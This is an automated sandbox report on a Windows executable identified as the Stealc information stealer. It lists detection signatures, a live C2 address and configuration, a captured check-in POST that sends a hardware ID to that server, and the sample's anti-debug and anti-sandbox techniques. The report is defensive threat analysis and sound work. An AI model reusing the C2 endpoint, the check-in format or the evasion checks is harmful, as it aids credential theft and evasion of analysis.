Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1531682
MD5:	1ad0ccf6d6aa03ebe1f0d87e2b21e748
SHA1:	a48f39c5b5a61d2aabf0d98844041e6b8ee3861e
SHA256:	3b22774fae4edcd3086ddfda63b8d6a7b469081f69845521570dc42f70a05e4d
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/ws	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.530000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0053C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00537240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00537240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00539AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00539AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00539B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00539B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00548EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00548EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005438B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00544910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00544910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0053DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0053E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00544570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00544570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0053ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0053BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0053DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005316D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0053F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00543EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00543EA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 31 30 44 46 44 33 42 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="hwid"37E10DFD3B8E3984212470------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build"doma------DGHJEHJJDAAAKEBGCFCA--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00534880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00534880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 31 30 44 46 44 33 42 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="hwid"37E10DFD3B8E3984212470------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build"doma------DGHJEHJJDAAAKEBGCFCA--

Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/&
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/BiQ
Source: file.exe, 00000000.00000002.1741085256.0000000001224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/C84BCA9C91821060E9A79u
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpConnectionSettings
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpF
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpJ
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phphi
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37oZ

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081B0A6	0_2_0081B0A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF9B7	0_2_008EF9B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084B1E2	0_2_0084B1E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CD1AD	0_2_007CD1AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008222FE	0_2_008222FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00904214	0_2_00904214
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900BA0	0_2_00900BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007DFD84	0_2_007DFD84
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FD63E	0_2_008FD63E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FA637	0_2_008FA637
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00881745	0_2_00881745
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081EF62	0_2_0081EF62

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 005345C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: iinbofzt ZLIB complexity 0.9948670885464936

Source: file.exe, 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00549600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00549600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00543720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00543720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OU5DW4AE.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1813504 > 1048576

Source: file.exe

Static PE information: Raw size of iinbofzt is bigger than: 0x100000 < 0x194a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.530000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iinbofzt:EW;gnwcqqyo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iinbofzt:EW;gnwcqqyo:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00549860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00549860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1bb645 should be: 0x1bad49

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: iinbofzt
Source: file.exe	Static PE information: section name: gnwcqqyo
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A150B8 push edx; mov dword ptr [esp], 5FBE8D00h	0_2_00A150EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A150B8 push 6CD5B4B7h; mov dword ptr [esp], esi	0_2_00A151B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00990084 push edx; mov dword ptr [esp], esi	0_2_0099014A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081B0A6 push 06CB0136h; mov dword ptr [esp], esi	0_2_0081B17C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081B0A6 push esi; mov dword ptr [esp], 59B914C9h	0_2_0081B192
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009908F9 push 10C74FE0h; mov dword ptr [esp], eax	0_2_00990930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054B035 push ecx; ret	0_2_0054B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009790E7 push 3A35086Fh; mov dword ptr [esp], edi	0_2_00979106
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009790E7 push 5C194CE4h; mov dword ptr [esp], esi	0_2_0097913D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A13804 push 233AAE31h; mov dword ptr [esp], ecx	0_2_00A13831
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0097D024 push 6477A542h; mov dword ptr [esp], edi	0_2_0097D0F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00974057 push 3A240A94h; mov dword ptr [esp], ecx	0_2_00974076
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088487C push ebx; mov dword ptr [esp], 00000000h	0_2_00884911
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0093B869 push 1E2E79E6h; mov dword ptr [esp], esi	0_2_0093B8A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BA989 push ecx; mov dword ptr [esp], ebx	0_2_009BA9BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00951180 push esi; mov dword ptr [esp], ecx	0_2_009511CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00951180 push ebp; mov dword ptr [esp], eax	0_2_009511D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009999BB push ebp; mov dword ptr [esp], 384CD99Dh	0_2_00999A1F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009CF1AD push ecx; mov dword ptr [esp], ebx	0_2_009CF1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF9B7 push 32EDA461h; mov dword ptr [esp], ebx	0_2_008EF9E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF9B7 push eax; mov dword ptr [esp], ecx	0_2_008EFA41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF9B7 push 43A76670h; mov dword ptr [esp], ebx	0_2_008EFA49
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF9B7 push eax; mov dword ptr [esp], ebx	0_2_008EFA8D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009081F5 push 58972CD5h; mov dword ptr [esp], ecx	0_2_009081FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084B1E2 push 1CD28792h; mov dword ptr [esp], edi	0_2_0084B1EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084B1E2 push 0890CBDAh; mov dword ptr [esp], eax	0_2_0084B2CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084B1E2 push edx; mov dword ptr [esp], edi	0_2_0084B31C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084B1E2 push esi; mov dword ptr [esp], 5FFB9B9Fh	0_2_0084B34B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009CC150 push ebp; mov dword ptr [esp], edx	0_2_009CC24A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009CC150 push 3214D443h; mov dword ptr [esp], ebx	0_2_009CC252
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CD1AD push ecx; mov dword ptr [esp], 2ADFF4EBh	0_2_007CD1C4

Source: file.exe

Static PE information: section name: iinbofzt entropy: 7.954146839777977

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00549860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791B46 second address: 791B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90068A second address: 90068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90068E second address: 900694 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900694 second address: 90069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90069E second address: 9006A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 791B5C second address: 791B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AC61 second address: 90AC65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AEF2 second address: 90AEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AEFB second address: 90AF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AF01 second address: 90AF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B475 second address: 90B47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B47B second address: 90B47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B47F second address: 90B48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFBC8B2DA96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B48B second address: 90B4A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC91A3BE7h 0x00000009 rdtsc
